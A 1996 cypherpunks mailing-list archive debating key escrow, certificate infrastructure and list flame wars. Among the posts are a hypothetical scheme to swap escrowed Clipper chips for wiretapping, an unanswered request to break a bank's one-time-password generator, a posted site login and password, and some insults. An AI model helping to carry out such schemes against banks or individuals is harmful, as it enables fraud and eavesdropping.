From: David Sternlight <david@sternlight.com>
Date: Tue, 16 Jul 1996 19:20:47 +0800
To: Michael Froomkin <tcmay@got.net>
Subject: Re: How I Would Ban Strong Crypto in the U.S.
In-Reply-To: <ae0efb9f020210046227@[205.199.118.202]>
Message-ID: <v03007600ae10984614ab@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:03 AM -0700 7/15/96, Michael Froomkin wrote:
>On Sun, 14 Jul 1996, Timothy C. May wrote:
>
>> So, who is in this "emerging consensus"?
>>
>Foreign governments?
>(Process of elimination, not inside info...)

Perhaps. And the vast inside-the-Beltway policy community, most of whom are
more like Dorothy Denning than Tim May. And the vast business community
that prefers automated escrow in standard systems. What I mean by that is
software or chips automatically escrowed to, say, Price Waterhouse.
Business is comfortable dealing with such firms in a trusted relationship,
and such firms will honor a valid court order to produce records or the
equivalent--a probable cause court-order for a wiretap.

It really depends on how the issue is presented. If it is presented as
preserving law enforcement access, escrow follows. The problem is that like
the nose of the camel, each new piece of legislation establishes a new
status quo baseline of principle from which to argue, and though we all
kicked and screamed about it here, the new baseline is the Digital
Telephony Act.

As for the only counterargument to the above, that bad guys aren't going to
use escrowed systems, nothing is perfect, goes the argument, and the FBI
has caught plenty of bad guys who presumably should have known better, via
wiretaps.

If you look into it, you will find that most people with criminal minds
don't expect to get caught.

Given the nature of this group it perhaps needs saying that the above is a
competitor analysis, not an argument nor my own position on mandatory
domestic key escrow. I'm agin it.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charley Sparks <sparks@bah.com>
Date: Tue, 16 Jul 1996 13:23:54 +0800
To: cypherpunks@toad.com
Subject: Someone can't read
Message-ID: <2.2.32.19960715220408.006a9a2c@bah.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

So, I'm a member of something anyway... could be worse... I
could be a politician... 
being a geek, at least requires "some" brains !!
{Snip snip }
>
>As I recall the NRC members in DC said, in *EXPLICITLY*
rejecting
>the "If only you know what we know..." mantra, that if there
was
>something the [NRC] did not know, it wasn't cuz that had not
asked
>everyone involved. (Or words to that effect)
>
>So it appears the Admin was withholding data from the
Congress....
>
>	I have here in front of me, documented proof that there
>	are crypto-carrying members of the Cypherpunk Party...
>
>
>-- 
>A host is a host from coast to
coast.................wb8foz@nrk.com
>& no one will talk to a host that's close........[v].(301)
56-LINUX
>Unless the host (that isn't close).........................pob
1433
>is busy, hung or
dead....................................20915-1433
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCXAwUBMeq/9+J+JZd/Y4yVAQGmHgQKAmooJ6NLnY3CF08TmYPOYvS9nDIMsYvL
cLDC7wGPo1nnWFmGHVgJzalDJgip2gDQZUdt4i96kCy4E4w1epJxerVkJW0b2edY
BF8HaZGLRlqDGNQIJwl+18gupV0g9DuchSiNgG5hodxrS8n/bLlRPGKeAKabKJY5
jvSyqR+tg6nUpA==
=L5pp
-----END PGP SIGNATURE-----

>
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jerome Tan <jti@i-manila.com.ph>
Date: Tue, 16 Jul 1996 20:55:32 +0800
To: "'WIN95-L@eva.dc.LSOFT.COM>
Subject: Exchange: Add PGP
Message-ID: <01BB732D.CA440AC0@ip134.i-manila.com.ph>
MIME-Version: 1.0
Content-Type: text/plain


How can I add PGP feature to Exchange?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Wed, 17 Jul 1996 01:09:51 +0800
To: cypherpunks@toad.com
Subject: Re: Sternlight on C'punks
In-Reply-To: <199607151701.KAA00537@mail.pacifier.com>
Message-ID: <v03007601ae109ae2b1b7@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:27 PM -0700 7/15/96, Mark O. Aldrich wrote:

>One of the blessings of c'punks was that it was not 'worthy' of the time
>of several professional flame-baiters who are fairly well-known on the
>'Net, in particular, David Sternlight.  Now, however, that seems to have
>changed.  If everyone thought things were weird around here with
>Detweiler, just wait until you see DS's stuff....

<worse stuff omitted>

Nothing like a good personal defamation before even reading my posts, eh?
As those who have paid attention know, I post my policy views, not
flame-bait. The idea that I am deliberately trying to start flame wars is
pure paranoia.

Of course a good attempt to attack personally is an attempt to avoid the
need to try to engage with the substance. It's not only underhanded, but
also sheer laziness, typical of small minds which cannot tolerate a
difference of view. Your position is as prejudiced as those we sometimes
call sexist or racist.

Having made my points on this matter, I have no plans to engage in a
flame-fest with those who love to provoke one and then blame the victim--to
be sure I don't give in to such further provocation from you, welcome to my
filter file.

David







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher Hull <nozefngr@apple.com>
Date: Tue, 16 Jul 1996 20:44:36 +0800
To: <jsw@netscape.com>
Subject: Re: CookieScan 0.0 rev 0
Message-ID: <199607160116.SAA24413@apple.com>
MIME-Version: 1.0
Content-Type: text/plain


>Subject:     Re: CookieScan 0.0 rev 0
>Sent:        7/15/96 4:57 PM
>Received:    7/15/96 6:01 PM
>From:        Jeff Weinstein, jsw@netscape.com
>To:          Christopher Hull, nozefngr@apple.com
>CC:          cypherpunks@toad.com
>
>Christopher Hull wrote:
>> What I imagine is a little utility that would
>> display the cookies stashed on a machine and
>> give the user the option to either delete or
>> <snicker> edit </snicker> any given cookie.
>> (Hey, it¹s *your* computer, not the website¹s).
>
>  I doubt that you will have much luck here.  Many (most??) sites
>that use cookies tend to encode or obscure them so that they are not
>human readable.  Certainly anyone doing something questionable
>will obscure their cookies so that they will not be user readable
>or editable.
>
I agree.  Editing is problematic.

It would be difficult to decode intentionally
hidden information.  The user may suspect strange and not
obvious stuff in a site's given cookie.  Then what may
happen is the user will "vote with their mouse" and stop
using a site that encripts cookie data (or perhaps not).

In any case the user will at least have the knowledge
that the cookie exists.  Those that do not encrypt may
provide other interesting information.

-Chris



...
...    smtp: nozefngr@apple.com
..     page: 1.800.680.7351
..     http: http://virtual.net/Personal/nozefngr/
..     icbm: lat37*21'.lon121*5'
..
..  the kabuki project: http://remarque.berkeley.edu/kabuki/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frogfarm@yakko.cs.wmich.edu (Damaged Justice)
Date: Tue, 16 Jul 1996 13:58:32 +0800
To: cypherpunks@toad.com
Subject: (fwd) krypt13i.zip Enkryptonator: Homonymous key encryption system, R. Newton
Message-ID: <199607152224.SAA04880@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain


[Anyone know more about this one? "Homonymous" in this context sounds a
tad oily.]

>From: mjk@reimari.uwasa.fi (Mika Koykka)
Newsgroups: comp.archives.msdos.announce
Subject: krypt13i.zip Enkryptonator: Homonymous key encryption system, R. Newton
Date: 15 Jul 1996 11:32:39 +0300
Lines: 82

Thank you for your contribution. This upload is now available as
 60605 Jul 2 22:10 ftp://garbo.uwasa.fi/pc/crypt/krypt13i.zip

: Date: Sun, 14 Jul 1996 15:10:55 -0500
: From: Enkryptonator <enkrypt@flash.net>
: To: pc-up@uwasa.fi
: Subject: krypt13i.zip Homonymous key encryption uploaded
: 
: I mailed a previous Email today, but it contained a typo in the file name
: uploaded.
: this message contains no such typo.
: 
: File name:
:            KRYPT13i.ZIP
:                       Enkryptonator: Homonymous key encryption system.
: Replaces:
:         KRYPT12.ZIP
: Suggested Garbo directory:
:         crypt
: Uploader name & email:
:         Richard Newton, enkrypt@flash.net
: Author or author company:
:         Richard Newton
: Email address:
:         enkrypt@flash.net
: Surface address:
:         Box 866292 Plano Tx 75086 USA.
: Special requirements:
:         Developed on MS-DOS 386 platform.
:         Math co-processor recommended, but not required.
: Shareware payment required from private users:
:         Yes, but not from students.
: Shareware payment required from corporates:
:         Yes.
: Distribution limitations:
:         None
: Garbo CD-ROM distribution allowed without extra preconditions:
:         Yes.
: Demo:
:         No.
: Nagware:
:         No, Displays none of the behavior described in your
:         instructions.
: Self-documenting:
:         Yes.
: External documentation included:
:         Yes, about 70Kb (unzipped).
: Source included:
:         No.
: Size:
:         60kb zipped.
: 10 lines description:
: 
: Enkryptonator is a newly developed encryption system based on the
: principles of homonymous key cryptography invented by Enkryptonator Co.
: Homonymous key systems are an exiciting, new breakthrough, that solve
: the 'key management' problem without resorting to 'public key'
: cryptography. No more unwieldy, impossible to remember, binary keys.
: Enkryptonator is easy to use.  Because of Enkryptonator's unique design
: no one who intercepts your encryption in an unauthorized manner can
: decrypt your file -- even if he knows the key of encryption! Everyone
: has a right to privacy and Enkryptonator will provide you a means of
: securing your personal and private concerns from unwanted intruders.
: 
: Long description:
: 
: This is the 1.3 International Shareware version of Enkryptonator.
: The international version will only allow a single key of encryption
: in order prevent running a-foul of US export control regulations on
: the export of encryption technology.
: 
: Version 1.3 introduces a 5% speed improvement and minor changes in
: messaging.  Version 1.3 is incompatible with version 1.2 and version
: 1.1.  These are the only code changes.  The most significant reason for
: releasing 1.3 is to provide users with more comprehensive and updated
: user documentation.

.................................................................
Mika Koykka, mjk@uwasa.fi   http://www.uwasa.fi/~mjk/
Moderating at garbo.uwasa.fi http://garbo.uwasa.fi/ FTP archives
Computer Centre, University of Vaasa,  Box 700, FIN-65101 Finland


--
"Your wish is my command, if you know what's good for you, bitch."
  - William Shakespeare
(Or perhaps it was his brother Fred who said that.)
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Tue, 16 Jul 1996 13:57:34 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Further Trends in Key Escrow?
In-Reply-To: <ae0fbf7b0602100466fc@[205.199.118.202]>
Message-ID: <Pine.SCO.3.93.960715182152.7939A-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 15 Jul 1996, Timothy C. May wrote:

> 
> I'm watching a CNBC report about the NASDAQ market and proposed fixes to
> certain alleged abuses about stock recommendations, bid-ask spreads,
> brokers, etc.
> 
> One of the "industry" proposals involving taping the phone calls of NASDAQ
> brokers. (The proposal: 10% of all calls to customers would be recorded for
> later review.)
> 

Many phone calls are recorded already, not under the premise of law
enforcement (or some sort of legal regulation), but under the notion of
quality assurance.

At what point does QA become "call escrowing" and does the SEC's
regulatory powers make it so it can't "escrow" calls for quality assurance
purposes?  If Merril Lynch decides to record calls for QA purposes, can
the SEC subpeona those "records" if it suspects illegal activity?  If
everyone's willing to patronize those businesses that record calls for
"QA" purposes (I tried not to and then gave up since nobody else seemed to
give a shit), will the SEC's quality assurance efforts be met with the
same lack of care by the consumers?  Or maybe they'll actually *LIKE* it.

------------------------------------------------------------------------- 
|Just as the strength of the Internet is  |Mark Aldrich                 |
|chaos, so the strength of our liberty    |GRCI INFOSEC Engineering     |
|depends upon the chaos and cacophony of  |maldrich@grci.com            |
|the unfettered speech the First Amendment|MAldrich@dockmaster.ncsc.mil |
|protects - District Judge Stewart Dalzell|                             |
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Tue, 16 Jul 1996 20:47:03 +0800
To: cypherpunks@toad.com
Subject: Re: Sternlight on C'punks
In-Reply-To: <199607151701.KAA00537@mail.pacifier.com>
Message-ID: <v03007602ae109d824fba@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:27 PM -0700 7/15/96, Mark O. Aldrich wrote:

>One of the blessings of c'punks was that it was not 'worthy' of the time
>of several professional flame-baiters who are fairly well-known on the
>'Net, in particular, David Sternlight.  Now, however, that seems to have
>changed.  If everyone thought things were weird around here with
>Detweiler, just wait until you see DS's stuff....

And another thing. The reason I've not joined this group earlier had
nothing to do with "worthy". It was because after discussion a year or so
ago, Tim May suggested to me via e-mail that it would just generate a lot
of controversy, at a time when people were so polarized that they couldn't
hear each other and thus my presence here would serve no useful purpose.  I
took Tim's advice and stayed out.

I thought that by now the more extreme dogmatists among you would have
matured, especially given the evidence generated by the real world about
how things are and are going if nothing rational and effective is done to
stop it. Some of you have met me at Crypto and found I'm not the devil
incarnate. Some of you know that we share many (but not all) policy views
in common.

The presenting symptom for my joining now was a copy of a post by an MIT
professor I respect to this group, which a colleague sent me. Perhaps I was
too hasty in my belief that we can begin to hear each other.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 17 Jul 1996 00:43:06 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: How I Would Ban Strong Crypto in the U.S.
Message-ID: <199607160158.SAA01591@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:53 AM 7/15/96 -0700, Bill Frantz wrote:

>
>I still think this whole GAK thing is going to fail on the, "Which
>government?" question.  I don't see either multi-nationals or their
>governments wanting to share their secrets with each other, and I don't see
>how to set up universal GAK to prevent that form of industrial espionage. 
>Also, the key which decodes the GAKed data is just too valuable and too
>easy to steal.


This most recent dispute between the American government and the EC 
community with respect to trading with Cuba (Helms-Burton act) is an 
excellent example that can be raised to challenge the concept of cooperation 
between countries that are ostensibly "allies."  The Helms law says, more or 
less, that American companies can sue foreign-based companies for using 
assets taken by Cuba in business.  The EC countries are outraged.  Were some 
sort of international-GAK system to already exist, you have to wonder how 
much luck the USG would have getting some escrowed key for the purposes of 
catching some Cuba-trader in the act:  Not a lot!  There's no point in 
setting up a system that practically invites disputes.

BTW, yet another problem with any sort of key-escrow system operated across 
government borders is this:  Let's suppose some foreign government illegally 
wiretapped somebody (say, a Senator or Representative?) in America using a 
Clipper-type telephone.  They tap the line and get the data.  They then 
claim that this conversation occurred between two Colombian drug smugglers.  
How is the American government going to know whether that's true?  Unless 
records are kept linking a particular Clipper chip set to the particular 
purchaser involved (all the way to the end-user customer), the keeper of the 
keys has no idea whether the evidence presented to justify the tap is 
actually associated with the data that is to be decrypted.

Yet another sneak:  If the system is REALLY a "key escrow" system, I should 
be able to get the decrypt key for my own telephone, right?  Well, suppose I 
buy a Clippper phone, call the escrow agency and ask for my key.  Then, I 
de-solder the Clipper chip from the board, do a black-bag job and swap the 
chip into another telephone that some bigshot owns.  He doesn't notice the 
swap, and nobody else will, either.  But at that point, I can decrypt 
anything I wiretap off of his line.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 16 Jul 1996 10:25:40 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: brokers as middlemen
Message-ID: <ae0fd46309021004509f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:48 PM 7/15/96, L. Detweiler wrote:

>this reminds me of something else. the stock exchange as it now stands
>is not the paradigm of true capitalism as some would have others
>believe. in fact I see it as the paradigm of what might be called
>"middleman capitalism", a version of capitalism that is rapidly
>diminishing and disappearing in the onslaught of the information age.
>
>essentially, in the new version of capitalism, middlemen who do not
>*add*value* to the delivery of a product are going to be increasingly
>cut out of the loop. I am not saying *all* middlemen will be cut out,
>but many that now exist will be.

I agree with Vlad/Larry's points, and this is in one of the other
recommendations for the NASDAQ, that it be even further
electronic-mediated, with more information made available on bid/ask
spreads.

The rise of discount brokers, who provide essentially no advice to
customers, is part of this "disintermediation." Ditto for electronic
trading systems, such as Accu-Trade.

>in my opinion, the *stock*broker* as his job is now defined is in many
>ways the classic middleman that does not necessarily add value to the
>information that flows through his hands. if he is just an agent for
>carrying out the demands of clients, then I'd say that this role is
>going to disappear as markets become more automated, or rather capital
>moves toward stock exchanges that diminish this overhead. however, there
>are many brokers that add far many more services than mere
>blind investor response, such as analyzing company profitability,
>forecasting, etc-- these are adding value imho.

Agreed, and this is already happening.

>I think the end result of the information age is going to be something
>that could be regarded as the ultimate capitalist market-- something
>that eliminates all "unnecessary" middlemen. I suspect the stock exchanges
>of the future will *not* be regulated because they *cannot* be. it
>will be a matter of buyers and sellers choosing the systems that
>best suit them regardless of what governments feel is appropriate, fair,
>or whatever.

I emphatically agree! There is little need for regulation in this new
environment, and "reputations matter." And regulation is becoming
problematic.

(To cite one example. Some are calling for registration and regulation of
"investment advice," which is largely unregulated in the U.S. today. That
is, I can self-publish a newsletter, "Tim's Stock Picks," and the First
Amendment says this can't be restricted (Caveat: But I can't sell "Tim's
Legal Advice," "Tim's Earthquake Safety Advice," or "Tim's Medical Advice"
to clients...go figure). Some want investment newsletter writers "held
accountable." Great, so I'll move my newsletter to Anguilla or Monaco. What
do they do then? Stop U.S. subscribers from getting them? Set up postal
stings, where illegal investment or medical advice is treated as illegal
child porn from Denmark? Use key escrow to monitor received Net traffic?)

>its interesting how the restrictions on stock buying and selling are
>becoming quite orwellian in the way they are designed to limit
>mere information transfer in many cases, it seems. TCM has written
>about this far better than I could in previous posts. ("inside trading"
>restrictions).

Again, I agree. I won't quote anymore of Vlad/Larry's piece, as I agree
with it all.

(Vznuri should probably "reclaim" his Detweiler personna, so that such good
messages as these accrue to his True Name's reputation.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Sternlight <david@sternlight.com>
Date: Wed, 17 Jul 1996 01:01:32 +0800
To: cypherpunks@toad.com
Subject: Re: How I Would Ban Strong Crypto in the U.S.
In-Reply-To: <ae0efb9f020210046227@[205.199.118.202]>
Message-ID: <v03007603ae10a1332d70@[192.187.162.15]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:58 AM -0700 7/15/96, Raph Levien wrote:

>2. The battle for key management has not yet been fought. The lack of a
>key management infrastructure is the main reason why people don't use
>PGP widely. This is demonstrated quite clearly by the fact that only a
>few of the people I correspond with, including many premail users,
>actually encrypt messages on a routine basis. If the key management
>stuff were in place, it would "just work."

It is about to be fought. I've got my money not on the government but on
Verisign, which has been issuing site certificates for some time now, and
just started issuing personal certificates which will permit message
encryption using certified, Netscape-generated public keys, among other
things. I think they and the free market will win, over the government,
hands down.

In that context (and in that context only), a lot of the heat from  PGP
fans against heirarchical certification is counter-productive to the above
battle, in that it diffuses the crispness with which successful secure (BBN
boxes, etc.) trusted heirarchical certification authorities will become the
de facto standard and freeze the government out (absent some new draconian
laws).

>
>3. Anybody can write an application that supports strong encryption
>algorithms. Witness SSH, a very impressive and useful program, which was
>basically done by one person, Tatu Ylonen. However, building a key
>management infrastructure will take lots of money, hard work, and
>cooperation.

Verisign and RSA have already made the investment and the mechanism is now
in place and working automatically (except for the higher assurance
certification for which you need to appear before a notary if you're not in
a corporate heirarchy). They've cleverly automated a validation of
moderate-assurance certificate applicants' claims by automatically hitting
the Equifax data base, and the low-assurance (persona) certification is
automated so you need to "just ask". This won't cover everyone, but will
cover so many as to make little difference to widespread acceptance.

>
>3a. Consider a future scenario in which a key management infrastructure
>allowed big, unescrowed keys to be distributed widely, but that export
>controls on clients prohibited the use of secure symmetric algorithms.
>Such a situation would not be stable - the incremental cost of
>uncrippled clients would be so small, and so tempting, that they would
>spread like wildfire.

Depends on the organizations. Big corporations (which carry considerable
influence) aren't going to violate local laws. Thus we may see a "have" and
"have not" escrow-less crypto world outside the US rather than the
hoped-for-nirvana, depending on local laws and individuals' willingness to
violate them.

>
>4. Thus, the best leverage for the TLAs to win is to guide the
>development of a key management infrastructure with the following
>property: if you don't register your key, you can't play. I believe that
>this is the true meaning of the word "voluntary:" you're free to make
>the choice not to participate.

That is exactly what the NRC report recommended and why I opposed it so
vigorously despite its other good features.

>
>5. This is _important_. If you can't get the keys for your
>correspondents, you can't use encryption. If they build a key management
>infrastructure that actually works, people will use it.
>

>6. Export is a two player game. The other country has to allow import of
>the stuff, too. If the Burns bill passes, the "administration" would
>strong-arm other countries to prohibit import of strong crypto, still
>leaving US developers with no market.

We don't have to strong-arm anyone. Harbingers in the UK, the European
Parliament (or is it the Council?), the Netherlands, and the existing
situation in France provide little reason for optimism.

>
>7. Building this stuff is too much of a task for the TLAs. They tried it
>with Clipper, and it failed. They hoped that building the Tessera card
>would be enough - that once they threw it over the wall, it would be
>eagerly snapped up by industry.

Remains to be seen. Netscape has a version they did for the government
which uses Tessera PCMCIA cards. If some big corporation adopts it, others
will follow. Don't count your chickens, etc.

>
>8. Thus, they're going to cajole, bribe, and coerce software companies
>to play along. This fact is quite nakedly exposed in the document (good
>thing the injunction against the CDA is still in force :-).

They don't have to do any of the above. All they have to do is legitimately
contract for their own needs. This will get the costs down (by paying off
the costs of entry/capital costs) so that civilian offerings from the same
technology base could be quite price-attractive. The use of government
market purchasing power to influence events is now very well understood--we
(and Arthur D. Little) first studied it in connection with stimulating
energy conserving buildings back in 1970 when I was in the Department of
Commerce.

> But, most
>importantly, neither of these systems can actually be used on a
>widespread basis, because of the lack of a key management
>infrastructure.

You will find it instructive to check out the Verisign web site, download
the public beta 5 of Netscape 3.0, generate some keys and get some
certificates, and in two or three months check out the promised Netscape
4.0 beta which will have e-mail encryption.

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Tue, 16 Jul 1996 15:31:11 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Sternlight on C'punks
In-Reply-To: <199607151701.KAA00537@mail.pacifier.com>
Message-ID: <Pine.SCO.3.93.960715185059.7939B-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 15 Jul 1996, jim bell wrote:

> >This post is a courtesy to others who may have been expecting more. 
> 
> It's not that we're expecting more...it's just that we're hoping for BETTER.
> 
> >It's a
> >one-time statement to this list, which I've just joined, of my current
> >practice: Silence does not constitute assent.
> >David
> 
> Well, that's where you're confused.  Our positions are not morally 
> equivalent.  Despite trying to hide behind the smokescreen of calling the 
> government's GAK position "voluntary," we all know that they are trying to 
> misuse their influence to gently force us to use GAK, if by no other means 
> that forcing the taxpayer to pay for the system as they have done already.  

Geezzzz, here we go....

One of the blessings of c'punks was that it was not 'worthy' of the time
of several professional flame-baiters who are fairly well-known on the
'Net, in particular, David Sternlight.  Now, however, that seems to have
changed.  If everyone thought things were weird around here with
Detweiler, just wait until you see DS's stuff....

Aside from the now-infamous "Who is David Sternlight, REALLY?" and "Who
does Sternlight REALLY work for" multi-generational, gigabyte-consuming,
bandwidth-devastating threads [search usenet archives for several YEARS
worth of traffic on these subjects] that have already graced the Internet
(note that Sternlight actually had his OWN usenet newsgroup), there's the
fear that DS will start a flame thrower exchange with anyone, regardless
of topic.  AND, he'll keep posting about it.  Relentlessly. 

After seeing what happened to sci.crypt (it was essentially wrecked for
anyone without killfile capability), I'd caution the c'punkers
(particularly the more vocal ones) to NOT TAKE THE BAIT.  It's only
natural that Perry, Jim, and the others be the first to take exception
to DS's stuff.  It's probably only going to get worse as DS is the
consummate flame king and he is at least as relentless as Detweiler.

God bless 'em, but it's time to add another line to the c'punks net.loon
warning file.

------------------------------------------------------------------------- 
|Just as the strength of the Internet is  |Mark Aldrich                 |
|chaos, so the strength of our liberty    |GRCI INFOSEC Engineering     |
|depends upon the chaos and cacophony of  |maldrich@grci.com            |
|the unfettered speech the First Amendment|MAldrich@dockmaster.ncsc.mil |
|protects - District Judge Stewart Dalzell|                             |
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tangent@alpha.c2.org (Tangent)
Date: Tue, 16 Jul 1996 23:48:33 +0800
To: cypherpunks@toad.com
Subject: Encryption over multiple platforms
Message-ID: <199607160232.TAA12447@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know of a hard-drive encryption program that has been ported to both DOS and Linux/UNIX based systems? I'm looking into installing some flavor of UNIX on my system, but still wish to retain my DOS based setup. Windows support would be a bonus, though not necessary.

Your help will be greatly appreciated.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Tue, 16 Jul 1996 16:22:17 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <199607150749.DAA25917@mh004.infi.net>
Message-ID: <Pine.SV4.3.91.960715193244.5030C-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> There are businesses that _only_ list their 800 numbers, and you can't
> find out the real phone number associated with them through directory
> assistance.

    I'll leave it to others to call such a joint and give their name, 
address, and credit card number to such an establishment.


> It's especially annoying when they've got an in-state or other non-nation-wide
> 800 number, or when you're calling from outside the US, especially when
> they're a business you'd like to be able to reach from anywhere, any time,
> like the travel agent your office uses

    Your straining my credulity to claim that you can't get ahold of the 
regular phone number of them.   Come on, are you 7 years old?




> And they may _only_ have
> the bank of phones that's got ANI service on it, and not have other phones.

   I don't think phone service is sold that way.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Tue, 16 Jul 1996 14:56:03 +0800
To: Raph Levien <s_levien@research.att.com>
Subject: Re: How I Would Ban Strong Crypto in the U.S.
Message-ID: <199607160001.UAA12295@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 15 Jul 96 at 9:58, Raph Levien wrote:
[..]
>    Thanks to Dave for posting this URL. This is a _very_ important 
> document, and I would recommend that all concerned cypherpunks read it 
> carefully. Unlike many of its predecessors, it is clearly written and 
> quite upfront about the "administration's" goals.

>From the document:

 "This framework will encourage commerce both here and abroad. It is
  similar to the approach other countries are taking, and will permit
  nations to establish an internationally interoperable key management
  infrastructure with rules for access appropriate to each country's
  needs and consistent with law enforcement agreements.  [...]"

With differing rules, I can't see how such a system can work.  What 
happens when one country wants the keys from the citizen of another 
who is 'favored' by the other's government? (ie, say the US gov't 
wants keys that a drug cartel kingpin uses when he chats with the 
brother of the president of some other country...)

And can one be sure that a country's LEAs request keys because a 
citizen is involved with 'organized crime', or is really a political 
activist of the unwanted kind?

What's to prevent cooperation of the FBI with foreign LE's (such as 
in Russia) with looser search-and-seizure rules?

Who is going to manage such systems? Private corporations in various 
countries?  Will users have a choice as to which to use?  (It would 
seem the institutions of some countries are less trustworthy than 
others for different people around the planet.)  How many people 
would trust the UN? (ObHumor: I hear in the year 2000 the Olympics 
will have black helicopter races...)

Global key management, even with universal rules, would seem 
unworkable.  Managing BILLIONS of keys will involve a lot of 
complexity, in terms of locating keys, data integrity and 
preservation, authentication, etc.

Methinks it's time for the administration to inhale... oxygen is good 
for the brain.

I think the potential of import controls has a bit more hype than the 
admin makes it out to be.  There's already a lot of strong crypto out 
there... so how much political strong-arming can the Admin do?

I wonder how the Microsoft C[r]API fits in to this, since it mentions 
"export of cryptography-ready operating systems".

Rob










---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 16 Jul 1996 21:41:58 +0800
To: cypherpunks@toad.com
Subject: Re: d.Comm: Your Login Information
In-Reply-To: <199607151820.OAA21615@sol.spiders.com>
Message-ID: <Pine.GUL.3.94.960715195807.16219E-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 15 Jul 1996 hotlists@d-comm.com wrote:

>            Login: cypherpunks
>           Passwd: 107084
>              URL: http://www.d-comm.com/

Hmm. I thought I'd set that up long ago.

Excellent site, btw, though their editorial slant isn't always to the
cypherpunk's advantage.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Mercer <Paul@opalbus.demon.co.uk>
Date: Tue, 16 Jul 1996 21:42:25 +0800
To: "cypherpunks@toad.com>
Subject: No Subject
Message-ID: <c=GB%a=_%p=Opal_Business_Sy%l=NTSERVER960715202610AB004A00@opalbus.demon.co.uk>
MIME-Version: 1.0
Content-Type: text/plain




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: =?ISO-8859-1?Q?J=FCri_Kaljundi?= <jk@stallion.ee>
Date: Tue, 16 Jul 1996 09:06:18 +0800
To: cypherpunks@toad.com
Subject: random numbers reverse-engineering
Message-ID: <Pine.GSO.3.93.960715201623.25388F-100000@nebula.online.ee>
MIME-Version: 1.0
Content-Type: text/plain



Is there somewhere where I could find more information on finding out RNG
algorithms or reverse-engineering RNG's, once you have some quantity of
random numbers generated by some RNG?

For example a local bank is giving each customer a list with 600 one-time
passwords (6-digit decimal numbers), and I believe they use the account
number as (one of the) seeds for the RNG. Is there some program that I
could use, together with the numbers and possible seed, to try to break
the RNG?

Jüri Kaljundi
AS Stallion
jk@stallion.ee





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tangent@alpha.c2.org (Tangent)
Date: Tue, 16 Jul 1996 19:44:08 +0800
To: cypherpunks@toad.com
Subject: Encrytions over multiple platforms
Message-ID: <199607160330.UAA17949@infinity.c2.org>
